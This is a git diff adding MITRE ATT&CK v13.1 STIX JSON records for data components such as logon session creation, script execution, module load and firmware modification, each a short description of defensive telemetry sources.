b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json new file mode 100644 index 0000000000000000000000000000000000000000..924c3018e5fd95dc8849ea124e9c4e226e54cbe6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ce6b62d9-c140-44b3-84f8-394c56dd2b20", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Container Enumeration", + "description": "An extracted list of containers (ex: docker ps)", + "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json new file mode 100644 index 0000000000000000000000000000000000000000..ff580fc66e9155bbacd030cc217b7c0e8d943a7d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--5becc2d9-fdc3-4419-b721-237b817e0ec6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:20:12.165Z", + "name": "Malware Metadata", + "description": "Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information", + "x_mitre_data_source_ref": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json new file mode 100644 index 0000000000000000000000000000000000000000..5b0f7a33a103617ef13d3a665d3cdc56dea3e205 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--3b417d40-62f3-47b7-807e-1f40d9a1fbaa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T15:41:36.287Z", + "name": "OS API Execution", + "description": "Operating system function/method calls executed by a process", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json new file mode 100644 index 0000000000000000000000000000000000000000..17f23f62bed2396809bad49cef2a29e172fbe641 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--cbabc778-e54f-4fb3-9998-f9abeaf4f9c1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Application Log Content", + "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json new file mode 100644 index 0000000000000000000000000000000000000000..78583bc32ab68dc0cd73d70042dcf67e4974676b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--57f35d6e-30ef-43ac-819e-b3f64e445118", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:18:20.802Z", + "name": "Logon Session Creation", + "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json new file mode 100644 index 0000000000000000000000000000000000000000..18d134427049a0e81db4b367500fda566c93a088 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--19892567-8cc7-4078-baa2-38aed837e965", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:16:55.269Z", + "name": "Script Execution", + "description": "The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json new file mode 100644 index 0000000000000000000000000000000000000000..cc9f658e306677fc7b0acaeb2139ada9f7595f39 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--bf7d1f2f-f52d-4f4f-815c-c8f969aafc9e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Container Creation", + "description": "Initial construction of a new container (ex: docker create )", + "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json new file mode 100644 index 0000000000000000000000000000000000000000..e40ef6cf012437f85685aec90228d5a79d1f7268 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--399e3ff3-14a0-4581-a45f-7cfe489746a7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json new file mode 100644 index 0000000000000000000000000000000000000000..90ac90defe340db832db8d5e9852b65e138d1d0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--b81a02b6-0c4b-4a82-9bcb-39c01f6aa379", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:19:46.282Z", + "name": "User Account Authentication", + "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json new file mode 100644 index 0000000000000000000000000000000000000000..834852ec6883ba3487a52b57371f29c3e332103f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d71a0496-f4d2-4e0d-b428-0ad97e234f68", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Image Creation", + "description": "Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json new file mode 100644 index 0000000000000000000000000000000000000000..3e52f7dffc7d18067d1f2f9bb7ffed71ec61cef9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3df9b3ef-cd98-4876-94b4-b43b2963bcfc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Cloud Service Metadata", + "description": "Contextual data about a cloud service and activity around it such as name, type, or purpose/function", + "x_mitre_data_source_ref": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json new file mode 100644 index 0000000000000000000000000000000000000000..956044ba0ad191d3857ab03829c1f902a32a37d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--553465bd-10e6-46a3-a60e-29d24d979f9a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Image Metadata", + "description": "Contextual data about a virtual machine image such as name, resource group, state, or type", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json new file mode 100644 index 0000000000000000000000000000000000000000..0402afa3d09b5e487459d907b752a50ec1fa0c6c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--37f8d05b-3c05-478f-8801-6ffce86222db", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Creation", + "description": "Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json new file mode 100644 index 0000000000000000000000000000000000000000..6d7739d3f153e77ba1c017a9b0507cf896a5ca65 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--6ef2a76f-af7a-4463-aefc-a9fb1044ce8d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "User Account Metadata", + "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json new file mode 100644 index 0000000000000000000000000000000000000000..1e6d54bb5ae3af1a54c92bbff00c20e764c32727 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9b306762-dd03-4b32-b7a9-ec4fac7e8c84", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Named Pipe Metadata", + "description": "Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)", + "x_mitre_data_source_ref": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json new file mode 100644 index 0000000000000000000000000000000000000000..93ad0bb626404b43f169db94d669fb886b899b48 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--450dee5f-0c6d-4143-9a51-0fbd9809806e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Firmware Modification", + "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)", + "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json new file mode 100644 index 0000000000000000000000000000000000000000..6f3bb22527b6783409d61c6bec8d3c023b22a292 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--14820c77-7557-4975-ab69-5b83cb67a1dc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Firewall Enumeration", + "description": "An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)", + "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json new file mode 100644 index 0000000000000000000000000000000000000000..df34fe5f1947c21ae8988c91393981201ab6669a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f49fa3e9-8069-4f6d-bf0d-696da4e6e955", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Module Load", + "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)", + "x_mitre_data_source_ref": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json new file mode 100644 index 0000000000000000000000000000000000000000..17319bdfc02c24d38f844951b57d187904edd7ab --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--3b7b6c62-dffb-4f54-8cdd-e207a365ca3f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-07T19:45:00.000Z", + "name": "Pod Metadata", + "description": "Contextual data about a pod and activity around it such as name, ID, namespace, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json 